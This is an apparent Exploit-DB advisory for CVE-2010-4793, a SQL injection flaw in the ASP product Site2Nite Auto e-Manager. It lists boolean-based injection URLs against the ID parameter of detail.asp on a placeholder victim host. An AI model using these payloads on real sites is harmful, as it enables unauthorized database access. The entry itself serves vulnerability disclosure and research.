[] NeoSense

Site2Nite Auto e-Manager - SQL Injection

Author: KnocKout
type: webapps
platform: asp
port: 
date_added: 2010-10-10 
date_updated: 2010-10-10 
verified: 1 
codes: OSVDB-68605;CVE-2010-4793 
tags: 
aliases:  
screenshot_url:  
application_url: 

==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation~~~~~~~~~~~

   http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
   http://VICTIM/www/detail.asp?ID=654 and 1=1  {True}
   http://VICTIM/www/detail.asp?ID=654 and 1=0  {False}

    ================================

     GoodLuck.